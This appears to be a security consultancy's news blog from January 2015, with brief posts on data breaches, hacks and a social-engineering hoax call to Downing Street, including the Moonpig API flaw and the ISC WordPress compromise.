Monday, 26 January 2015

Hoax Call to Downing Street Strikes Again...

Time to review your security posture Downing Street?
A hoax caller, claiming to be Robert Hannigan, director of government monitoring agency GCHQ,was put through to Prime Minister David Cameron.
It is claimed David Cameron ended the call when it became clear to him it was a hoax and no sensitive information was disclosed.
This comes after GCHQ were conducting a review when Mr Hannigan's mobile phone number was disclosed during an earlier hoax call.
Even more surprisingly, the prankster managed to obtain mobile numbers for both the head of the GCHQ surveillance centre and the prime minister by bluffing his way past both sets of switchboards. The prankster went on to call the Sun newspaper to boast about his actions, claiming "he'd made monkeys" out of GCHQ despite being high on drink and drugs.
But we can all make mistakes and move on!? But shockingly this has happened before...In 1998, radio DJ Steve Penk, pretended to be the Conservative leader William Hague and managed to speak to Tony Blair. 
In 2002, hoaxers overwhelmed the Downing Street switchboard by tricking thousands of people into calling Number 10, asking to speak to "Tony".
Just shows the simplest of things can slip through the net. What Security review have you undertaken recently?

Tuesday, 20 January 2015

No Cinderella Story for Shoe Retailer Office

Shoe retailer, Office, have been warned to up its Security game by the Information Commissioners Office (ICO).

May 2014, saw Office have a untidy data breach which exposed more than one million customer details. This included personal data, however (luckily) no financial data was compromised. Office have said they have now rectified the issues.

So how did it happen? The ICO was informed that a member of the public had hacked into an unencrypted historical Office database that was being stored on a server outside the core infrastructure of the retailer's current website.

From there, the individual gained access to the personal data of more than one million office customers, including contact details and website passwords.

But it highlights the question where do retailers store their data and why? How long should it be stored? 

Data Breach 

Tuesday, 13 January 2015

IS-Group Hack US Centcom Twitter



The Twitter and YouTube accounts of the US military command were suspended for a few hours after being hacked by a group claiming to back Islamic State.

Centcom claimed it wasn't a serious breach, no operational impact or classified information was posted. The timing of the speech coincidently happened at the same time as President Barack Obama was giving his speech on Cyber Security...





Monday, 12 January 2015

Charlie Hebdo Fallout - Anonymous Declares War on Attackers

Anonymous have declared war on jihadists after the France attacks. The group released a video  statement condemning the gun attack on the French Magazine Charlie Hebdo. 
'The anonymous of all the planet have decided to declare war on you terrorists, we will track you down to the last one and will kill you. You allowed yourselves to kill innocent people, will will therefore avenge their death. We will track your activities on-line, we will close your accounts on all social media.'
The video featured the hashtag #OpCharlieHebdo, meaning Operation Charlie Hebdo.

More information at BBC News

Tuesday, 6 January 2015

Morgan Stanley Employee Reportedly Fired for Stealing 350K Client Data

Morgan Stanley fires an employee who has allegedly stole 350,000 clients data.


The terminated employee in question was named as Galen Marsh, a 30 year old financial advisor. Morgan Stanley realised that there was an issue on 27th December 2014, when it was discovered account names, numbers and transaction data for more than 900 clients posted on the internet.

There is no evidence of financial losses to customers and Morgan Stanley has notified law enforcement and impacted customers.

How does that impact the UK and what are the current standards for notifying breaches? 'Organisations who provide a service allowing members of the public to send electronic messages (eg telecoms providers or internet service providers) are required to notify us if a personal data breach occurs.' Cited and referenced ICO

More regulations and standards to come out in 2015, with the EU Data protection reform.



MoonPig.Flawed as Company Exposes 3 Million Records

Moonpig’s brand reputation and business took a hefty hit today as a significant flaw is revealed that exposes some three million customers’ personal records and partial credit card details.  What’s more, as the news hits the web today it seems Moonpig knew of this almost 18 months ago.  So, what happened?

The failure, initially discovered and privately reported by developer, Paul Price, meant every account and the names, birth dates and email and street addresses could be accessed by changing the customer identification number sent in an API request.

Orders could be placed under any account.  Credit card expiry dates and the last four digits could be plucked out using a handy, insecure API.  Script-busting rate limiters were nowhere to be seen making it a cash cow for black hats, vandals and their bots. 

Even more surprising, is that Moonpig has left the door open for so long.  Price initially notified them in August 2013 and chased them in September 2014 when Moonpig promised to fix it by Christmas. Now in 2015, the flaw remained open immediately prior to the story’s publication on the Register this morning.  The question is, why the lag when it’s core to their business and equally there is expertise on the market to help them protect their business?


Monday, 5 January 2015

ISC website Compromised: Possible Vulnerable WordPress Plugin

The Internet Systems Consortium (ISC) website – a WordPress site – was quickly taken down last week after researchers at Cyphort Labs notified the open source software provider that its main page had been modified and was ultimately redirecting visitors to the Angler Exploit Kit.

In a Monday email correspondence, Victoria Risk, director of marketing at ISC, told SCMagazineUK.com that ISC is not certain how its website was compromised, but the organisation suspects it was through a vulnerable plugin – possibly the Slider Revolution plugin, which was being exploited recently in what is referred to as the ‘SoakSoak' attacks.

“We of course read up on WordPress vulnerabilities, and read about the [SoakSoak] problem that Sucuri had published,” Risk said. “We had already removed and deleted the supposed bad plug-in by the time this Angler Exploit infection was discovered, but it is possible that the earlier compromised plug-in had already installed a back-door by the time we removed it.”

ISC does not believe it was targeted specifically, according to Risk. She said that the organisation is now redirecting visitors to other static servers where people can access all ISC resources, and she explained that ISC is rebuilding the entire website from scratch.

Cited and more on this story at SCMagazine